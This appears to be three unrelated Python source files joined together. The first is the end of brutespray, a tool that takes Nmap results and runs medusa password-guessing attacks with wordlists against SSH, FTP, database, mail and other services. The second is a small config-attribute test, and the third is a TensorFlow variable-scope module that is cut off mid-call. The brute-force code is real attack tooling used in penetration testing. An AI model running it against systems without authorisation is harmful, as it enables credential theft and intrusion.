userlist = '/usr/share/brutespray/wordlist/'+service+'/user'
if not os.path.exists(userlist):
userlist = 'wordlist/'+service+'/user'
uarg = '-U'
elif auserlist:
userlist = auserlist
uarg = '-U'
elif ausername:
userlist = ausername
uarg = '-u'
elif acombo:
userlist = acombo
uarg = '-C'
if apasslist is None and apassword is None and acombo is None:
passlist = '/usr/share/brutespray/wordlist/'+service+'/password'
if not os.path.exists(passlist):
passlist = 'wordlist/'+service+'/password'
parg = '-P'
elif apasslist:
passlist = apasslist
parg = '-P'
elif apassword:
passlist = apassword
parg = '-p'
elif acombo:
parg = ''
passlist = ''
if acontinuous:
cont = ''
else:
cont = '-F'
if service == "smtp":
aarg = "-m"
auth = "AUTH:LOGIN"
else:
aarg = ''
auth = ''
p = subprocess.Popen(['medusa', '-b', '-H', fname, uarg, userlist, parg, passlist, '-M', service, '-t', athreads, '-n', port, '-T', ahosts, cont, aarg, auth, '-v', averbose, '-w', adebug], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, bufsize=1)
out = "[" + colors.green + "+" + colors.normal + "] "
output_file = output + '/' + port + '-' + service + '-success.txt'
for line in p.stdout:
print(line.strip('\n'))
sys.stdout.flush()
time.sleep(0.0001)
if 'SUCCESS' in line:
f = open(output_file, 'a')
f.write(out + line)
f.close()
def animate():
sys.stdout.write('\rStarting to brute, please make sure to use the right amount of ' + colors.green + 'threads(-t)' + colors.normal + ' and ' + colors.green + 'parallel hosts(-T)' + colors.normal + '... \n')
t_end = time.time() + 2
for c in itertools.cycle(['|', '/', '-', '\\']):
if not time.time() < t_end:
break
sys.stdout.write('\rOutput will be written to the folder: ./' + colors.green + args.output + colors.normal + "/ "+ c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\n\nBrute-Forcing... \n')
time.sleep(1)
def loading():
for c in itertools.cycle(['|', '/', '-', '\\']):
if loading == True:
break
sys.stdout.write('\rLoading File: ' + c)
sys.stdout.flush()
time.sleep(0.01)
def getInput(filename):
in_format = None
with open(filename) as f:
line = f.readlines()
if filename.endswith("gnmap"):
in_format = "gnmap"
if filename.endswith("json"):
in_format = "json"
if filename.endswith("xml"):
in_format = "xml"
if '{' in line[0]:
in_format = "json"
if '# Nmap' in line[0] and not 'Nmap' in line[1]:
in_format = "gnmap"
if '<?xml ' in line[0]:
in_format = "xml"
if in_format is None:
print('File is not correct format!\n')
sys.exit(0)
return in_format
def parse_args():
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, description=\
"Usage: python brutespray.py <OPTIONS> \n")
menu_group = parser.add_argument_group(colors.lightblue + 'Menu Options' + colors.normal)
menu_group.add_argument('-f', '--file', help="GNMAP, JSON or XML file to parse", required=False, default=None)
menu_group.add_argument('-o', '--output', help="Directory containing successful attempts", default="brutespray-output")
menu_group.add_argument('-s', '--service', help="specify service to attack", default="all")
menu_group.add_argument('-t', '--threads', help="number of medusa threads", default="2")
menu_group.add_argument('-T', '--hosts', help="number of hosts to test concurrently", default="1")
menu_group.add_argument('-U', '--userlist', help="reference a custom username file", default=None)
menu_group.add_argument('-P', '--passlist', help="reference a custom password file", default=None)
menu_group.add_argument('-C', '--combo', help="specify a combo input (host:user:password)", default=None)
menu_group.add_argument('-u', '--username', help="specify a single username", default=None)
menu_group.add_argument('-p', '--password', help="specify a single password", default=None)
menu_group.add_argument('-c', '--continuous', help="keep brute-forcing after success", default=False, action='store_true')
menu_group.add_argument('-i', '--interactive', help="interactive mode", default=False, action='store_true')
menu_group.add_argument('-m', '--modules', help="dump a list of available modules to brute", default=False, action='store_true')
menu_group.add_argument('-q', '--quiet', help="supress banner", default=False, action='store_true')
menu_group.add_argument('-v', '--verbose', help="verbose output from medusa [0-6], default=5", default="5")
menu_group.add_argument('-w', '--debug', help="debug error output from medusa [0-10], default=5", default="5")
args = parser.parse_args()
if args.file is None and args.modules is False:
parser.error("argument -f/--file is required")
return args
if __name__ == "__main__":
args = parse_args()
if args.quiet == False:
print(banner)
else:
print(quiet_banner)
supported = ['ssh','ftp','telnet','vnc','mssql','mysql','postgresql','rsh',
'imap','nntp','pcanywhere','pop3',
'rexec','rlogin','smbnt','smtp',
'svn','vmauthd','snmp']
#temporary directory for ip addresses
if args.modules is True:
print(colors.lightblue + "Supported Services:\n" + colors.green)
print(('\n'.join(supported)))
print(colors.normal + "\n")
try:
tmppath = tempfile.mkdtemp(prefix="brutespray-tmp")
except:
sys.stderr.write("\nError while creating brutespray temp directory.")
exit(4)
if not os.path.exists(args.output):
os.mkdir(args.output)
if os.system("command -v medusa > /dev/null") != 0:
sys.stderr.write("Command medusa not found. Please install medusa before using brutespray")
exit(3)
if args.file is None:
sys.exit(0)
if args.passlist and not os.path.isfile(args.passlist):
sys.stderr.write("Passlist given does not exist. Please check your file or path\n")
exit(3)
if args.userlist and not os.path.isfile(args.userlist):
sys.stderr.write("Userlist given does not exist. Please check your file or path\n")
exit(3)
if args.combo and not os.path.isfile(args.combo):
sys.stderr.write("Combolist given does not exist. Please check your file or path\n")
if os.path.isfile(args.file):
try:
t = threading.Thread(target=loading)
t.start()
in_format = getInput(args.file)
{
"gnmap": make_dic_gnmap,
"xml": make_dic_xml,
"json": make_dic_json
}[in_format]()
except:
print("\nFormat failed!\n")
loading = True
sys.exit(0)
if args.interactive is True:
interactive()
animate()
if services == {}:
print("\nNo brutable services found.\n Please check your Nmap file.")
else:
print("\nError loading file, please check your filename.")
to_scan = args.service.split(',')
for service in services:
if service in to_scan or to_scan == ['all']:
for port in services[service]:
fname = tmppath + '/' +service + '-' + port
iplist = services[service][port]
f = open(fname, 'w+')
for ip in iplist:
f.write(ip + '\n')
f.close()
brute_process = Process(target=brute, args=(service,port,fname,args.output,args.userlist,args.username,args.passlist,args.password,args.continuous,args.hosts,args.threads,args.verbose,args.combo,args.debug))
brute_process.start()
#need to wait for all of the processes to run...
|
test_frozen_attribs.py
|
from typing import Dict, Any
import torch.multiprocessing as mp
from torch import nn
from core.base_abstractions.experiment_config import ExperimentConfig
from core.base_abstractions.task import TaskSampler
from utils.experiment_utils import TrainingPipeline
# noinspection PyAbstractClass,PyTypeChecker
class MyConfig(ExperimentConfig):
MY_VAR: int = 3
@classmethod
def tag(cls) -> str:
return ""
@classmethod
def training_pipeline(cls, **kwargs) -> TrainingPipeline:
return None
@classmethod
def create_model(cls, **kwargs) -> nn.Module:
return None
@classmethod
def make_sampler_fn(cls, **kwargs) -> TaskSampler:
return None
def my_var_is(self, val):
assert self.MY_VAR == val
# noinspection PyAbstractClass
class MySpecConfig(MyConfig):
MY_VAR = 6
@classmethod
def machine_params(cls, mode="train", **kwargs) -> Dict[str, Any]:
return {}
@classmethod
def tag(cls) -> str:
return "SpecTag"
scfg = MySpecConfig()
class TestFrozenAttribs(object):
def test_frozen_inheritance(self):
from abc import abstractmethod
from core.base_abstractions.experiment_config import FrozenClassVariables
class SomeBase(metaclass=FrozenClassVariables):
yar = 3
@abstractmethod
def use(self):
raise NotImplementedError()
class SomeDerived(SomeBase):
yar = 33
def use(self):
return self.yar
failed = False
try:
SomeDerived.yar = 6 # Error
except Exception as _:
failed = True
assert failed
inst = SomeDerived()
inst2 = SomeDerived()
inst.yar = 12 # No error
assert inst.use() == 12
assert inst2.use() == 33
@staticmethod
def my_func(config, val):
config.my_var_is(val)
def test_frozen_experiment_config(self):
val = 5
failed = False
try:
MyConfig()
except:
failed = True
assert failed
scfg.MY_VAR = val
scfg.my_var_is(val)
failed = False
try:
MyConfig.MY_VAR = val
except RuntimeError:
failed = True
assert failed
failed = False
try:
MySpecConfig.MY_VAR = val
except RuntimeError:
failed = True
assert failed
for fork_method in ["forkserver", "fork"]:
ctxt = mp.get_context(fork_method)
p = ctxt.Process(target=self.my_func, kwargs=dict(config=scfg, val=val))
p.start()
p.join()
if __name__ == "__main__":
TestFrozenAttribs().test_frozen_inheritance() # type:ignore
TestFrozenAttribs().test_frozen_experiment_config() # type:ignore
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange, zip # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.types import core
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
_api_usage_gauge = monitoring.BoolGauge(
"/tensorflow/api/resource_variables",
"Whether variable_scope.enable_resource_variables() is called.")
class _PartitionInfo(object):
"""Holds partition info used by initializer functions."""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape of
the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for offset, shape in zip(var_offset, full_shape):
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(shape),
self.full_shape,
len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
_api_usage_gauge.get_cell().set(True)
@tf_export(v1=["resource_variables_enabled"])
def resource_variables_enabled():
"""Returns `True` if resource variables are enabled.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
return _DEFAULT_USE_RESOURCE
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
_api_usage_gauge.get_cell().set(False)
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys and
the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). `trainable`
defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method. The signature
of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes: `def
custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed: `def
custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs): return getter(name +
'_suffix', *args, **kwargs) ```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError("Passed a custom_getter which is not callable: %s" %
custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (
shape is not None and isinstance(shape, collections_lib.Sequence) and
not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError("Partitioner must be callable, but received: %s" %
partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable (defaults to
`DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
partitions = None
if not reuse or partitioner:
partitions = _call_partitioner(partitioner, shape, dtype)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?" % name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s." % (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s." % (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (partitions is not None and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, num_slices = _get_slice_dim_and_num_slices(partitions)
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not." %
(num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d." %
(num_slices, name, name, num_slices))
vs = []
for i, (var_offset, var_shape) in enumerate(
_iter_slices(shape.as_list(), num_slices, slice_dim)):
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(
var_full_name + "/PartitionedInitializer", skip_on_eager=False):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: disable=protected-access
var._set_save_slice_info(
variables.Variable.SaveSliceInfo(name, shape.as_list(), var_offset,
var_shape))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(
name=name,
shape=shape,
dtype=dtype,
